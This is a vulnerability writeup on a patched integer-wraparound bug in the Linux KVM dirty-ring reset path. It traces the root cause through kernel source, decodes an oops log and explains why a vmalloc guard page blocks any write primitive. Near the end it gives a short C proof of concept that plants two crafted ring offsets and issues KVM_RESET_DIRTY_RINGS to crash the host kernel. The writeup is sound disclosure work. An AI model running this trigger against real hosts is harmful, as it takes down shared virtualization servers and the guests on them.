2026-05-16 - research
A KVM dirty-ring OOB that the allocator quietly defuses
A u64 wraparound in KVM's dirty-ring bounds check lets a userspace VMM drive an out-of-bounds index into the per-memslot reverse-map array. The rmap array lives in vmalloc address space, so the access lands inside the preceding guard page and faults before any value is loaded. The result is a deterministic host-kernel DoS. This writeup walks the bounds check, the wraparound, and why the vmalloc guard page closes the door cleanly enough that nothing downstream is reachable.
Verified on Linux v6.13.7 and v7.0.6. Target: virt/kvm/dirty_ring.c and arch/x86/kvm/mmu/mmu.c. Patched upstream on 2026-05-12 as commit 577a8d3bae05 ("KVM: Reject wrapped offset in kvm_reset_dirty_gfn()"), Cc: stable@vger.kernel.org. Fixes fb04a1eddb1a ("KVM: X86: Implement ring-based dirty memory tracking") — the original 5.10 introduction of the dirty ring.
Setup — the dirty ring is shared writable
KVM's dirty-ring tracking is the mechanism the host uses to tell the VMM which guest pages were dirtied since the last sync. Each ring entry is a struct kvm_dirty_gfn with three fields: flags, slot, and offset. The ring pages are mmap'd by the VMM with PROT_READ | PROT_WRITE — intentionally, because the VMM needs to ack entries by writing flags. kvm_vcpu_mmap() at kvm_main.c:3982 does not strip VM_WRITE for dirty-ring pages, and nothing else policies which fields the VMM is allowed to scribble on.
The bug is that the kernel also reads the slot and offset fields back from the ring during reset — after the VMM has had a chance to overwrite them with values the kernel never wrote.
// virt/kvm/dirty_ring.c:125-126 -- kvm_dirty_ring_reset
next_slot = READ_ONCE(entry->slot); // attacker-controlled
next_offset = READ_ONCE(entry->offset); // attacker-controlled
READ_ONCE prevents the compiler from re-reading the field and racing with itself; it does not validate that the value matches what the kernel originally wrote. The trust boundary between host and VMM is being crossed in the wrong direction here.
Root cause — the bounds check wraps in u64
Inside kvm_reset_dirty_gfn(), the kernel coalesces a 64-bit mask of nearby dirty offsets and validates the highest bit against the memslot:
// virt/kvm/dirty_ring.c:69 -- kvm_reset_dirty_gfn
if (!memslot || (offset + __fls(mask)) >= memslot->npages)
return;
Both offset and __fls(mask) are u64. With offset = 0xFFFFFFFFFFFFFFC1 and __fls(mask) = 63, the sum is 0x10000000000000000, truncated to 0. Zero is less than npages, so the check passes. The wrapped value of offset — still 0xFFFFFFFFFFFFFFC1 — is what propagates downstream.
Reaching the corner case requires getting __fls(mask) high enough. That is done by the coalescing loop a few lines up:
// virt/kvm/dirty_ring.c:138-142
s64 delta = next_offset - cur_offset;
if (delta >= 0 && delta < BITS_PER_LONG) {
mask |= 1ull << delta;
continue;
}
Two crafted ring entries are enough. The first sets offset = 0xFFFFFFFFFFFFFFC1, the second sets offset = 0. As a signed 64-bit subtraction, 0 - 0xFFFFFFFFFFFFFFC1 = 63, which falls inside [0, BITS_PER_LONG). Bit 63 of mask gets set; __fls(mask) = 63; the wrap fires.
Downstream — OOB into the rmap array
The wrapped offset reaches gfn_to_rmap() through the standard write-protect path:
// arch/x86/kvm/mmu/mmu.c:1010-1016 -- gfn_to_rmap
idx = gfn_to_index(gfn, slot->base_gfn, level);
return &slot->arch.rmap[level - PG_LEVEL_4K][idx];
// arch/x86/kvm/mmu/mmu.c:1213-1233 -- kvm_mmu_write_protect_pt_masked
while (mask) {
rmap_head = gfn_to_rmap(slot->base_gfn + gfn_offset + __ffs(mask),
PG_LEVEL_4K, slot);
rmap_write_protect(rmap_head, false);
mask &= mask - 1;
}
With the wrap, idx evaluates to 0xFFFFFFFFFFFFFFC1 — i.e. -63 when interpreted as a signed offset into the array. Since sizeof(struct kvm_rmap_head) = 8, the addressable target is exactly 8 * 63 = 504 bytes before the rmap allocation. More generally, varying which bit in mask drives __fls yields a backward window of [-8, -504] bytes from rmap_array_base.
rmap_write_protect() then reads rmap_head->val at the OOB address. If non-zero, it interprets the value as either a direct SPTE pointer or a pte_list_desc * and clears the writable bit. That is a kernel OOB read followed by a conditional kernel OOB write at an attacker-influenced address. On a slab allocation it would be the start of a familiar exploit chain.
The half-step — where the rmap actually lives
The previous draft of this writeup assumed the rmap array was a slab object, and reasoned about spraying kmalloc-2048 or kmalloc-4096 neighbours to control the value at rmap_head->val. That reasoning is wrong. Look at the allocator:
// arch/x86/kvm/x86.c:13483
slot->arch.rmap[i] = __vcalloc(lpages, sz, GFP_KERNEL_ACCOUNT);
__vcalloc() is a thin wrapper around __vmalloc_array_noprof() — always vmalloc, never slab. Every vmalloc area allocated through __get_vm_area_node() gets a guard page reserved immediately before it, unless VM_NO_GUARD is set. The rmap array does not set VM_NO_GUARD. The 4 KiB region directly preceding the rmap base is therefore an unmapped guard page, populated in the page tables only enough that the walk descends — the leaf PTE is zero.
The OOB window is [-8, -504] bytes. The guard page is 4096 bytes. The window fits inside the guard for every conceivable configuration of the allocator. The OOB load faults; the conditional write below it never executes.
Runtime verification
Stage A of the PoC drives the kernel into the OOB load and produces the following oops on v7.0.6 with kvm.tdp_mmu=0 (so that kvm_memslots_have_rmaps() is true):
BUG: unable to handle page fault for address: ffffaa6580034e08
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 1000067 P4D 1000067 PUD 1146067 PMD 1147067 PTE 0
RIP: 0010:rmap_write_protect+0x6/0xf0
RAX: ffffffffffffffc1 RBX: 8000000000000001
RDI: ffffaa6580034e08 RDX: ffffaa6580035000
Every register tells you exactly what happened:
RAX = 0xffffffffffffffc1— the wrappedoffset(-63ass64).RBX = 0x8000000000000001— the coalesced mask;__fls(mask) = 63.RDX = 0xffffaa6580035000— page-aligned, the rmap array base.RDI = 0xffffaa6580034e08— the OOB dereference target.0x35000 - 0x34e08 = 0x1f8 = 504bytes below the base, matching-63 * sizeof(struct kvm_rmap_head)exactly.- Page-table walk:
PGD/P4D/PUD/PMDall populated,PTE 0. The PMD descended into the region but the specific leaf is unmapped. That is the signature of a vmalloc guard page.
This is not a "got unlucky and faulted" outcome — it is structural. The guard page sits between the previous vmalloc allocation and this one by allocator invariant. Every configuration of memslot size, NUMA placement, and surrounding vmap state preserves it.
Reachability of the conditional write
The conditional clear-bit primitive in rmap_write_protect() requires rmap_head->val to load successfully and return a non-zero value that passes either the direct-SPTE or the pte_list_desc interpretation. The load itself faults before any value is consumed, so:
- No controlled value can be placed in the guard page — it is unmapped by construction.
- No spray or grooming primitive available from this bug puts anything inside the guard.
- Defeating the bound requires defeating vmalloc's guard invariant. This bug does not provide that primitive.
The OOB access faults before any value reaches downstream code. It is a host-kernel oops, full stop.
Proof of concept
Two ring entries with crafted offset values, a KVM_RESET_DIRTY_RINGS ioctl, and a host that panics on the spot:
// 1. Create VM with dirty ring enabled
int kvm_fd = open("/dev/kvm", O_RDWR);
int vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0);
// ... enable KVM_CAP_DIRTY_LOG_RING, create a memslot,
// create a vCPU, run it long enough to push entries ...
// 2. Map the dirty ring read-write
struct kvm_dirty_gfn *ring = mmap(NULL, ring_size,
PROT_READ | PROT_WRITE, MAP_SHARED,
vcpu_fd, KVM_DIRTY_LOG_PAGE_OFFSET * PAGE_SIZE);
// 3. Mark all entries RESET, plant the wraparound pair
for (int i = 0; i < num_entries; i++) {
ring[i].flags = KVM_DIRTY_GFN_F_RESET;
if (i == target_idx) {
ring[i].slot = 0;
ring[i].offset = 0xFFFFFFFFFFFFFFC1ULL; // wraps the bound
} else if (i == target_idx + 1) {
ring[i].slot = 0;
ring[i].offset = 0; // delta = 63
}
}
// 4. Trigger reset -- OOB rmap access -> guard-page fault -> oops
ioctl(vm_fd, KVM_RESET_DIRTY_RINGS, 0);
Preconditions: /dev/kvm access (typically the kvm group), KVM_CAP_DIRTY_LOG_RING enabled, and a memslot with an allocated rmap. The last requires shadow paging (ept=0 / npt=0 or kvm.tdp_mmu=0), nested virtualization with shadow roots, or write-tracked slots. Not guest-triggerable — the ring is mapped only from the vCPU fd, which only the VMM holds.
Impact
| Factor | Value |
|---|---|
| Attack vector | Local (VMM process with /dev/kvm) |
| Complexity | Low (mmap + two ioctls) |
| Privileges required | /dev/kvm access, typically kvm group |
| User interaction | None |
| Scope | Unchanged — VMM userspace crashes the host kernel |
| Confidentiality | None (OOB load is consumed internally; no readback channel) |
| Integrity | None (the OOB access faults before any value is loaded) |
| Availability | High (deterministic host kernel oops/panic) |
The upstream fix
The patch is two lines. It splits the addition so the first sub-expression cannot wrap, and the second sub-expression can only execute once offset is known small. memslot->npages is bounded well below U64_MAX, so once offset < npages holds and __fls(mask) < BITS_PER_LONG, the sum cannot overflow into the valid range.
--- a/virt/kvm/dirty_ring.c
+++ b/virt/kvm/dirty_ring.c
@@ -63,7 +63,8 @@ static void kvm_reset_dirty_gfn(...)
memslot = id_to_memslot(__kvm_memslots(kvm, as_id), id);
- if (!memslot || (offset + __fls(mask)) >= memslot->npages)
+ if (!memslot || offset >= memslot->npages ||
+ offset + __fls(mask) >= memslot->npages)
return;
KVM_MMU_LOCK(kvm);
Landed as 577a8d3bae05 on 2026-05-12, marked Fixes: fb04a1eddb1a and Cc: stable@vger.kernel.org for backport to every kernel that ever shipped KVM_CAP_DIRTY_LOG_RING (5.10+).
The rmap array is __vcalloc'd, so the OOB walks into vmalloc's guard page instead of adjacent kernel memory — the allocator decision, not the bounds check, is what kept this bounded.
References
| Field | Value |
|---|---|
| Upstream commit | 577a8d3bae05 |
| Title | KVM: Reject wrapped offset in kvm_reset_dirty_gfn() |
| Fixes | fb04a1eddb1a ("KVM: X86: Implement ring-based dirty memory tracking") |
| Stable | Cc: stable@vger.kernel.org — backport to all kernels with KVM_CAP_DIRTY_LOG_RING (5.10+) |